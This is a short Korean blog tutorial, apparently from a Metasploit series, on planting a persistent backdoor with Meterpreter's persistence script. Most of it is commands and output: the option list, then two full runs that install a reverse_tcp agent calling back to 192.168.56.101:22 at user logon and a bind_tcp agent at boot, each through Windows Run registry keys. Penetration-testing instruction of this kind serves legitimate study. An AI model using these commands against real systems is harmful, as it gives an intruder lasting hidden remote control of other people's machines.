[MAD-METASPLOIT] 0x34 - Persistence Backdoor

by hahwul 1 min read

Persistence backdoor

Meterpreter는 Persistence 를 이용하여 시스템에 백도어를 남겨 지속적으로 접근할 수 있는 통로를 만들 수 있습니다.

meterpreter > run persistence -h

[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe. [!] Example: run post/windows/manage/persistence_exe OPTION=value […] Meterpreter Script for creating a persistent backdoor on a target host.

OPTIONS:

-A        Automatically start a matching exploit/multi/handler to connect to the agent
-L <opt>  Location in target host to write payload to, if none %TEMP% will be used.
-P <opt>  Payload to use, default is windows/meterpreter/reverse_tcp.
-S        Automatically start the agent on boot as a service (with SYSTEM privileges)
-T <opt>  Alternate executable template to use
-U        Automatically start the agent when the User logs on
-X        Automatically start the agent when the system boots
-h        This help menu
-i <opt>  The interval in seconds between each connection attempt
-p <opt>  The port on which the system running Metasploit is listening
-r <opt>  The IP of the system running Metasploit listening for the connect back

각각 옵션에 따라 부팅 시 , 로그온 시 등 설정이 가능합니다.

User 로그온 시 reverse connection 하도록 backdoor 생성

meterpreter > run persistence -U -i 5 -p 22 -r 192.168.56.101

[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe. [!] Example: run post/windows/manage/persistence_exe OPTION=value […] [] Running Persistence Script [] Resource file for cleanup created at /root/.msf4/logs/persistence/HAHWUL_20170807.5914/HAHWUL_20170807.5914.rc [] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.56.101 LPORT=22 [] Persistent agent script is 99642 bytes long [+] Persistent Script written to C:\Users\SILENC~1\AppData\Local\Temp\vnJKNtOW.vbs [] Executing script C:\Users\SILENC~1\AppData\Local\Temp\vnJKNtOW.vbs [+] Agent executed with PID 8068 [] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ljAYMQEIrbRBJb [+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ljAYMQEIrbRBJb

System이 부팅되자마자 22번 포트를 bind 시키는 형태의 backdoor 생성

meterpreter > run persistence -X -i 5 -p 22 -r 192.168.56.101 -P windows/meterpreter/bind_tcp

[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe. [!] Example: run post/windows/manage/persistence_exe OPTION=value […] [] Running Persistence Script [] Resource file for cleanup created at /root/.msf4/logs/persistence/HAHWUL_20170807.0044/HAHWUL_20170807.0044.rc [] Creating Payload=windows/meterpreter/bind_tcp LHOST=192.168.56.101 LPORT=22 [] Persistent agent script is 99692 bytes long [+] Persistent Script written to C:\Users\SILENC~1\AppData\Local\Temp\QCaMHq.vbs [] Executing script C:\Users\SILENC~1\AppData\Local\Temp\QCaMHq.vbs [+] Agent executed with PID 1592 [] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\gOuJoRmXcHbUao [+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\gOuJoRmXcHbUao